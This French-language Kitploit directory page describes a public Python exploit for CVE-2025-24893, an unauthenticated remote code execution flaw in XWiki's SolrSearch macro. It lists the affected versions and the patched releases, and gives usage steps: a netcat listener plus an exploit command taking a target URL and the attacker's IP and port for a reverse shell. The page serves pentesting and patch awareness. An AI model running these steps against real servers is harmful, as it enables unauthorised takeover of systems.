Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-24893 — Exploit d'exécution de code à distance (RCE) dans XWiki | Kitploit
Outils/GitHubGitHub/hasecto/cve-2025-24893
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubhasecto/cve-2025-24893

CVE-2025-24893

Exploit d'exécution de code à distance (RCE) dans XWiki

Voir le dépôt
il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-24893

Exploit d'Exécution de Code à Distance (RCE) dans XWiki

Un exploit en Python3 pour la CVE-2025-24893, une vulnérabilité critique d'Exécution de Code à Distance Non Authentifiée (RCE) affectant la plateforme XWiki.

Ce script exploite une faille d'Injection de Code/Expression (CWE-95) dans le composant de la macro SolrSearch. La faille permet aux attaquants d'exécuter du code Groovy/Java arbitraire sur le système d'exploitation sous-jacent. L'exploit effectue automatiquement un encodage en Base64 pour contourner les limitations d'interprétation des commandes de la fonction Runtime.getRuntime().exec() de Java.

📊 Détails de la Vulnérabilité

  • ID CVE: CVE-2025-24893
  • Score CVSS: 9.8 Critique (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
  • CWE: CWE-95 (Improper Neutralization of Expression Language Expression / Eval Injection)
  • Composant cible: /bin/get/Main/SolrSearch (via le paramètre text)

🔍 Versions Affectées

  • Toutes les versions de 5.3-milestone-2 à 15.10.10
  • Versions 16.0.0-rc-1 à 16.4.0

🚀 Comment Utiliser

1. Lancez votre listener (Netcat) sur Kali Linux :

root@kitploit:~
nc -lvnp 4444

2. Exécutez l'exploit :

root@kitploit:~
python3 CVE-2025-24-893.py <URL_ALVO> <SEU_IP_VPN> <SUA_PORTA>

Exemple :

root@kitploit:~
python3 CVE-2025-24-893.py http://domain.local 10.10.14.229 4444

🛠️ Prérequis

  • Python 3.x
  • Bibliothèque requests

Pour installer la dépendance nécessaire :

root@kitploit:~
pip install requests

🛡️ Correction

Mettez à jour votre instance XWiki vers l'une des versions officielles corrigées : 15.10.11, 16.4.1, 16.5.0-rc-1 (ou supérieures).

⚠️ Avis Légal (Disclaimer)

Ce script a été développé exclusivement à des fins éducatives, pour des audits de sécurité autorisés et des tests d'intrusion (Pentest). L'auteur décline toute responsabilité en cas d'utilisation abusive, de dommages ou d'activités illégales causés par cet outil. L'utilisation de ce script contre des cibles sans autorisation préalable est strictement illégale.

Télécharger l’outil